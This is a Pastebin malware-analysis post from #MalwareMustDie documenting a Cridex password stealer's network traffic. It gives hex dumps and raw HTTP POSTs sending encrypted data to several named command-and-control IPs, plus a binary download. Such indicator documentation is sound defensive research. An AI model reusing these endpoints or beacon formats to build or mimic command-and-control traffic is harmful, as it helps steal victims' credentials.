Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ===========================--
- #MalwareMustDie - BHEK2 PD079
- Cridex - Password stealer
- NETWORK ACTIVITY EVIDENCE
- @unixfreaxjp /malware]$ date
- Sun Dec 9 21:21:01 JST 2012
- ===========================
- HTTP/1.1 POST request was sent to 180.235.150.72:8080 contains encrypted data:
- // 192.168.7.84 ---> 180.235.150.72 HTTP/POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- 00000000 50 4f 53 54 20 2f 4e 35 6e 6d 4c 43 41 41 41 2f POST /N5 nmLCAAA/
- 00000010 4c 78 63 71 4b 41 41 2f 47 4c 6b 4f 56 43 41 41 LxcqKAA/ GLkOVCAA
- 00000020 41 41 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 AA/ HTTP /1.1..Ac
- 00000030 63 65 70 74 3a 20 2a 2f 2a 0d 0a 55 73 65 72 2d cept: */ *..User-
- 00000040 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 Agent: M ozilla/5
- 00000050 2e 30 20 28 57 69 6e 64 6f 77 73 3b 20 55 3b 20 .0 (Wind ows; U;
- 00000060 4d 53 49 45 20 37 2e 30 3b 20 57 69 6e 64 6f 77 MSIE 7.0 ; Window
- 00000070 73 20 4e 54 20 36 2e 30 3b 20 65 6e 2d 55 53 29 s NT 6.0 ; en-US)
- 00000080 0d 0a 48 6f 73 74 3a 20 31 38 30 2e 32 33 35 2e ..Host: 180.235.
- 00000090 31 35 30 2e 37 32 3a 38 30 38 30 0d 0a 43 6f 6e 150.72:8 080..Con
- 000000A0 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 34 37 tent-Len gth: 347
- 000000B0 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 ..Connec tion: Ke
- 000000C0 65 70 2d 41 6c 69 76 65 0d 0a 43 61 63 68 65 2d ep-Alive ..Cache-
- 000000D0 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 Control: no-cach
- 000000E0 65 0d 0a 0d 0a e....
- 000000E5 15 7d 92 25 cf 68 92 5b ae 96 b0 62 ed 8f 24 fb .}.%.h.[ ...b..$.
- 000000F5 5b bb 87 19 f4 34 6c d9 95 67 20 a7 fb 66 f3 6c [....4l. .g ..f.l
- 00000105 3f 25 7a f7 41 b1 67 6a 12 c3 99 5d ea 1a cd b7 ?%z.A.gj ...]....
- 00000115 cf 67 e6 ca 91 50 f2 2d ad 89 41 4a d4 65 d7 c7 .g...P.- ..AJ.e..
- 00000125 d2 32 d7 16 b0 fd 49 c2 52 e6 56 cc 5a 71 1e 50 .2....I. R.V.Zq.P
- 00000135 9f 0a 76 4d 44 9d 0e 25 ec 0a 5b 53 ba d3 20 0c ..vMD..% ..[S.. .
- 00000145 08 cb 10 ce 37 dc 2a 12 b5 67 94 1c c7 1e 02 95 ....7.*. .g......
- 00000155 c8 c8 37 9d 05 90 8a 28 9e 5d 7a 59 a4 d3 1e a4 ..7....( .]zY....
- 00000165 65 0a 06 8a 9a 27 2c 2e 48 85 25 9b e3 24 05 0b e....',. H.%..$..
- 00000175 59 36 d2 a2 b2 8e 58 90 ba 2e 64 96 4a 02 85 bc Y6....X. ..d.J...
- 00000185 95 58 2c e0 b2 d9 1f 62 df c4 a2 b3 3d 7d 6a 65 .X,....b ....=}je
- 00000195 38 f1 ea 27 36 a6 9a 35 9b 66 32 a2 28 c1 01 56 8..'6..5 .f2.(..V
- 000001A5 73 c7 7b 23 e7 b2 a7 26 ef c8 8b 64 00 3b 9a a2 s.{#...& ...d.;..
- 000001B5 da a3 08 ec 91 60 71 9e 99 60 fc 2d 19 9a 0f 54 .....`q. .`.-...T
- 000001C5 32 25 ed 7d a7 33 dc 7e db e3 97 a2 69 e9 34 ac 2%.}.3.~ ....i.4.
- 000001D5 87 47 13 69 71 74 2f b7 cf 07 99 42 14 4f 6c 5b .G.iqt/. ...B.Ol[
- 000001E5 b3 6c 19 0a ee a0 7a 77 cb d1 a9 ba a5 18 d9 4c .l....zw .......L
- 000001F5 22 ed 4a ce 00 1e 1d ec 90 80 a4 26 4f 6a 8e cc ".J..... ...&Oj..
- 00000205 b0 3e 04 2f 9c 73 91 1a e9 7c 1e 75 17 de c5 f4 .>./.s.. .|.u....
- 00000215 c3 b8 3a 59 74 98 ca de 6b 56 bc 4f bb ad 74 d7 ..:Yt... kV.O..t.
- 00000225 1f dd 8a e3 5c 25 ac 15 50 02 41 a0 4a d7 c1 c6 ....\%.. P.A.J...
- 00000235 52 70 6c 4c 1c 6d 90 12 ac 9d f9 RplL.m.. ...
- Which answered by sending the binary from 180.235.150.72 to TestPC:
- // 180.235.150.72 ===> 192.168.7.84 TCP [TCP segment of a reassembled PDU]
- Server: nginx/1.0.10
- Date: Sun, 09 Dec 2012 07:19:02 GMT
- Content-Type: text/html; charset=UTF-8
- Transfer-Encoding: chunked
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
- 00000010 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 .Server: nginx/1
- 00000020 2e 30 2e 31 30 0d 0a 44 61 74 65 3a 20 53 75 6e .0.10..D ate: Sun
- 00000030 2c 20 30 39 20 44 65 63 20 32 30 31 32 20 30 37 , 09 Dec 2012 07
- 00000040 3a 31 39 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 :19:02 G MT..Cont
- 00000050 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 ent-Type : text/h
- 00000060 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 tml; cha rset=UTF
- 00000070 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 -8..Tran sfer-Enc
- 00000080 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a oding: c hunked..
- 00000090 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 Connecti on: keep
- 000000A0 2d 61 6c 69 76 65 0d 0a 58 2d 50 6f 77 65 72 65 -alive.. X-Powere
- 000000B0 64 2d 42 79 3a 20 50 48 50 2f 35 2e 33 2e 31 38 d-By: PH P/5.3.18
- 000000C0 2d 31 7e 64 6f 74 64 65 62 2e 30 0d 0a 56 61 72 -1~dotde b.0..Var
- 000000D0 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 y: Accep t-Encodi
- 000000E0 6e 67 0d 0a 0d 0a 66 33 62 0d 0a bb aa ef 6f 93 ng....f3 b.....o.
- 000000F0 90 d7 73 f7 37 87 c1 c0 79 61 6f 30 b5 fb 96 65 ..s.7... yao0...e
- 00000100 c0 cf 78 a3 b6 7e b1 87 29 30 90 a5 5f 09 fc d5 ..x..~.. )0.._...
- 00000110 fd ca a6 f1 88 4d 29 a7 48 dc 28 f7 42 83 c2 1b .....M). H.(.B...
- 00000120 99 7b dd ca a6 a3 b0 87 74 5c 72 2f f6 3e c2 28 .{...... t\r/.>.(
- : :
- : :
- 0006DC14 fb b5 0b 98 5d d8 bd b1 69 8c 26 79 a1 d5 2c b6 ....]... i.&y..,.
- 0006DC24 57 55 f0 ee cd 5b 42 4a 13 4e 3e 5f 92 5e 17 4e WU...[BJ .N>_.^.N
- 0006DC34 dd b5 64 90 d4 4e a8 b0 36 03 f1 de 58 a9 d3 69 ..d..N.. 6...X..i
- 0006DC44 1c ef 59 f2 20 33 18 24 a6 74 42 23 04 14 19 c9 ..Y. 3.$ .tB#....
- 0006DC54 92 f4 88 1e e9 68 05 1d 6b e2 b8 e3 3f f4 ea 85 .....h.. k...?...
- 0006DC64 84 2f 81 7d c8 6e 96 a5 9a 88 7a c2 72 ee d7 2f ./.}.n.. ..z.r../
- 0006DC74 45 6c 0d eb 0a f3 7b c2 21 68 1b d0 01 2e 70 45 El....{. !h....pE
- 0006DC84 8e 0d 0a 30 0d 0a 0d 0a ...0....
- There are more than 3(three) times tries to handshake connection with remote IP: 132.248.49.112
- 192.168.7.84 ===> 132.248.49.112 TCP netarx > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 132.248.49.112 => 192.168.7.84 TCP http-alt > netarx [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- Also it tries to handshake connection with remote IP: 113.130.65.77
- 192.168.7.84 ===> 113.130.65.77 TCP optima-vnet > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 113.130.65.77 ==> 192.168.7.84 TCP http-alt > optima-vnet [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- Then it communicate in HTTP with 203.113.98.131:80
- 192.168.7.84 ===> 203.113.98.131 HTTP POST /asp/intro.php HTTP/1.0
- Request sent:
- --------------
- POST /asp/intro.php HTTP/1.0
- Host: 203.113.98.131
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Content-Length: 251
- Connection: close
- Content-Type: application/octet-stream
- Content-Encoding: binary
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- CRYPTED0...DK.V..aa..c.....PI%.^D.|2.s;.p..T=....*.........
- MX.../......../.;(.dl7).c..).......Jk.rO..e....!].......|.ej
- ......6.H.y4J_.......f2...8..P.V.....oy.....$...6.z.8.. .0..
- .1..H,.....nCa.Z.....?I...r.q-.........7f[......O....vX0-.&.
- -D.D5.......
- Response received:
- -------------------
- HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sun, 09 Dec 2012 07:21:47 GMT
- Content-Type: text/html; charset=windows-1251
- Connection: close
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 16
- STATUS-IMPORT-OK
- Then it also connect to remote IP: 173.224.221.135:8080 to send the POST data,
- with the following recorded communication:
- 192.168.7.84 173.224.221.135 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 173.224.221.135:8080
- Content-Length: 408
- Connection: Keep-Alive
- Cache-Control: no-cache
- ..c....S..l.........r.......6.l{IMs6.....S......uOKvE...u..}Q?&UM..j..`...%=W+3.........
- .r......e..md.h.%.O...0]fr......M.M.....o..P.cm& ......[.(j.hW....M. Y..Y....)eL.....u..q
- @..>.1.y..k.A=.!.....hZ.[...........ln..~..`M..>......|t."S..Y.o-fx.......
- 4..Bv...
- .+.}}..2C.&....VSmZO...g6..=?P.6......,6'_T.J
- .\..!GZ.7..#..........:F.r...e
- .........."..tPWJs... ....+.".U....f&#..!."..0.8|s?.LNp.}......D.tI.0.
- HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sun, 09 Dec 2012 07:22:32 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`......hJ....^.<..
- e....
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 173.224.221.135:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- B..L.l.............qe..x..p
- e.,-........4.q...1X..|..........O...rP.5cO<.B./...q.......%...T..........
- ^.H...J.n.N.l0.s ..d..w}E.....]....B'..Qt..k..Qu.....J"z........Y...:.....u.....jL.
- ....#|......=...$..*.*..z......x......zd..y@+4..+./
- ..*...|N..aZY.@)...}...r6..^y.N0{..7.<c.=) ._..V..5:...g........f........~=...R..pZ....v=d..!.......p.......
- $=...q..:#....c.N..]...w..kA....R.P}U[5.
- HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sun, 09 Dec 2012 07:22:33 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`......Qh......>&.......
- It sends the POST data to 206.176.226.157:8080 as follows.....
- 192.168.7.84 ===>206.176.226.157 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 206.176.226.157:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- o...C.G..rj.....X.......M.2.X;..c2.f...~.....9.6..x..=d..K.p...8.b.J.H.. ?.S..F.:8.g....3l..J..f....Ww....ng...~
- ..7FS..~P...vlB....]....B'..Qt..k....\..e6..........]...M...O..$.\U..<
- ....:P...GO.W.Uv.A(.l.............*.s.$....*O......su..G....d.;m.J]A.........!...+...
- (mF.I....-
- ..$. .;....WS..rj.nH:.\.V.5.Z...
- ..z..........V.......8.....6.+h...Ju.4;....)#h..D.$=.).....3.:\q.r^.5...LHTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sun, 09 Dec 2012 07:23:09 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`........X..a%..........
- ----
- #MalwareMustDie!!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement